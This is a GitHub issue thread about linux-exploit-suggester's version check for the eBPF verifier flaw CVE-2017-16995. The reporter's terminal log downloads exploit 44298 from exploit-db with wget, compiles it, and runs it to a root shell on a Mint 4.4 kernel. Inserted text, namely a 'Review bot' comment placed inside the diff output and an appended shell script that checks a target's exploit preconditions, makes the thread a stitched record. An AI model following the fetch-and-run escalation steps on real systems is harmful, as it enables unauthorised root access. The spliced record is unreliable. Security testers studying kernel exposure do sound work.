[CVE-2017-16995] Incorrect kernel version check
bcoles opened this issue · 2 comments
bcoles commented
It appears the kernel version check for CVE-2017-16995 is incorrect.
As an example, on a vulnerable Linux Mint 18 kernel 4.4.0-116-generic system:
user@mint-18 ~/Desktop/linux-exploit-suggester $ uname -r
4.4.0-116-generic
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
user@mint-18 ~/Desktop/linux-exploit-suggester $ fg
vi linux-exploit-suggester.sh
[1]+ Stopped vi linux-exploit-suggester.sh
user@mint-18 ~/Desktop/linux-exploit-suggester $ git diff linux-exploit-suggester.sh
diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh
index e9c88d4..cad912c 100755
--- a/linux-exploit-suggester.sh
+++ b/linux-exploit-suggester.sh
@@ -688,7 +688,7 @@ EOF
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
-Reqs: pkg=linux-kernel,ver>=4.9,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
+Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=16.04.4(kernel:4.4.0-116)
analysis-url: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
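Review bot: lowering the minimum to `ver>=4.4` makes the Reqs line consistent with the existing `Tags: ubuntu=16.04.4(kernel:4.4.0-116)` entry, which was already outside the old `ver>=4.9` range, but the match is on the upstream version number only, so every 4.4 to 4.8 kernel will now be reported as a candidate whether or not its distro actually carried the backported verifier code. Consider saying so on the Comments line, e.g. "Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1; 4.4 is reported because Ubuntu backported the vulnerable code, other 4.4 kernels may not be affected", so users know a 4.4 hit needs confirming before running the exploit.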
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./linux-exploit-suggester.sh | grep 2017-16995
[+] [CVE-2017-16995] eBPF_verifier
Details: https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
The 4.4.0-116-generic kernel on Ubuntu and Linux Mint is confirmed vulnerable to the exploit:
user@mint-18 ~/Desktop/linux-exploit-suggester $ wget 'https://www.exploit-db.com/download/44298'
--2018-03-25 15:32:03-- https://www.exploit-db.com/download/44298
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [application/txt]
Saving to: ‘44298’
44298 100%[=====================================================>] 5.88K --.-KB/s in 0s
2018-03-25 15:32:04 (1.06 GB/s) - ‘44298’ saved [6021/6021]
user@mint-18 ~/Desktop/linux-exploit-suggester $ mv 44298 44298.c
user@mint-18 ~/Desktop/linux-exploit-suggester $ gcc 44298.c
user@mint-18 ~/Desktop/linux-exploit-suggester $ ./a.out
task_struct = ffff880036c23800
uidptr = ffff880038381c04
spawning root shell
mint-18 linux-exploit-suggester # id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),130(sambashare),1000(user)
It seems there is some confusion over the CVEs. For example, the following sources provide conflicting information on the affected kernels:
- https://www.securityfocus.com/bid/102288
- http://openwall.com/lists/oss-security/2017/12/21/2
- https://usn.ubuntu.com/3523-2/
Regardless, the specified exploit works on the 4.4 kernel.
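As an added example that is not part of this issue or of linux-exploit-suggester itself, the following POSIX shell script re-implements the three conditions on the corrected Reqs line (kernel version between 4.4 and 4.14.8 inclusive, CONFIG_BPF_SYSCALL=y in the kernel config, and kernel.unprivileged_bpf_disabled not equal to 1) as a standalone pre-flight check that can be run before trying the exploit. The function names, the `--live` flag and the config-file lookup order are assumptions of the example; like the suggester, it compares the upstream version number only, so a 4.4 kernel that never received the backported verifier code is still reported and needs confirming.

```shell
#!/bin/sh
# Added example, not linux-exploit-suggester code: a pre-flight check for the
# CVE-2017-16995 Reqs line  ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,
# sysctl:kernel.unprivileged_bpf_disabled!=1

# ver_num VERSION: reduce "4.4.0-116-generic" to a comparable integer
# (major*1000000 + minor*1000 + patch); a missing patch level counts as 0.
ver_num() {
    printf '%s\n' "$1" | sed 's/[^0-9.].*//' \
        | awk -F. '{ printf "%d\n", $1*1000000 + $2*1000 + $3 }'
}

# check_cve_2017_16995 KVER CONFIG_FILE SYSCTL_VALUE
# Returns 0 when every requirement holds, 1 otherwise; the first failing
# requirement is written to stderr so the caller sees why it was rejected.
check_cve_2017_16995() {
    kver="$1"; cfg="$2"; bpf_disabled="$3"
    n=$(ver_num "$kver")
    # Version window: the range is inclusive on both ends, as in the Reqs line.
    if [ "$n" -lt "$(ver_num 4.4)" ] || [ "$n" -gt "$(ver_num 4.14.8)" ]; then
        echo "kernel $kver is outside 4.4..4.14.8" >&2
        return 1
    fi
    # The eBPF syscall must be compiled in; "# CONFIG_BPF_SYSCALL is not set"
    # must not match, hence the whole-line (-x) match.
    if ! grep -qx 'CONFIG_BPF_SYSCALL=y' "$cfg" 2>/dev/null; then
        echo "CONFIG_BPF_SYSCALL=y not found in $cfg" >&2
        return 1
    fi
    # Unprivileged bpf() must still be allowed (sysctl value 1 blocks it).
    if [ "$bpf_disabled" = "1" ]; then
        echo "kernel.unprivileged_bpf_disabled=1, unprivileged bpf() is blocked" >&2
        return 1
    fi
    return 0
}

# check_running_kernel: gather the same three inputs from the live system.
# Config is read from /boot/config-$(uname -r), falling back to /proc/config.gz.
check_running_kernel() {
    kver=$(uname -r)
    cfg="/boot/config-$kver"
    if [ ! -r "$cfg" ] && [ -r /proc/config.gz ]; then
        cfg=$(mktemp)
        zcat /proc/config.gz > "$cfg"
    fi
    # Older kernels lack this sysctl entirely; treat "absent" as not disabled.
    sysctl_val=$(cat /proc/sys/kernel/unprivileged_bpf_disabled 2>/dev/null || echo 0)
    check_cve_2017_16995 "$kver" "$cfg" "$sysctl_val"
}

# Run the live check only when asked, so the functions can also be sourced.
if [ "${1:-}" = "--live" ]; then
    if check_running_kernel; then
        echo "[+] $(uname -r): CVE-2017-16995 requirements met, confirm with the exploit"
    else
        echo "[-] $(uname -r): not a candidate for CVE-2017-16995"
    fi
fi
```

Run it as `sh check.sh --live` on the target; a `[+]` result means the three preconditions hold, not that the exploit will succeed, which only the exploit itself confirms as the transcript above shows.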
bcoles commented
Appears the bug was backported to the 4.4 kernel:
mzet- commented
Thanks.